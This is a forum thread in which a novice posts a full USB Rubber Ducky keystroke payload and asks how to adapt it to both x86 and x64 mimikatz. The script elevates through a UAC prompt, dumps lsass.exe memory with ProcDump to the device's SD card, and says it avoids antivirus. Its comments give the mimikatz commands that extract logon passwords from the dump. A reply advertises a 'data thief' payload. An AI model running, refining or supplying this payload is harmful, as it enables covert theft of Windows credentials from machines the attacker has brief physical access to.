Applenuts Posted October 10, 2013 Posted October 10, 2013 Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimkatz\ProcDump payload. My issue lies in the fact that I have to switch the mimkatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then pluging in, swaping files, and so on. Or having seperate .bins (SHIFT+payload button or CTRL+payload button, ect.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE ***************************************************************************************************************************************************************************** REM Author: Hak5Darren with the help of:REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, SysinternalsREMREM Description: "Backup" Windows Passwords without setting off AntiVirusREM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDumpREM Passwords can be later be extracted using mimikatz.REMREM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SDREM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmpREM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspxREMREM Target: Windows Vista/7/8, Win32/x64REM *** UAC Bypass ***DELAY 2000WINDOWS rDELAY 200STRING powershell Start-Process cmd.exe -Verb runAsENTERDELAY 2000ALT yDELAY 500REM *** Define DUCKY drive as %duck%STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%dENTERDELAY 500REM *** Execute procdump from SD card and save log file to disk ***STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmpENTERREM *** GTFO ***STRING exitENTERREM *** Post Exploitation ***REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to aREM directory including the version of mimikatz for your targets architectureREM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commandsREM mimikatz.exe <enter>REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>REM sekurlsa::logonPasswords full <enter> ***************************************************************************************************************************************************************************** Quote
Applenuts Posted October 12, 2013 Author Posted October 12, 2013 * ^ * Note~ I am trying to add something from the Ducky Tool Kit Payload Generator to the above code. Quote
UnKn0wnBooof Posted October 25, 2013 Posted October 25, 2013 Maybe you should take a look at my Ducky payload. Its called "ULTIMATE DATA THEIF!!". It should definitely answer your question. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.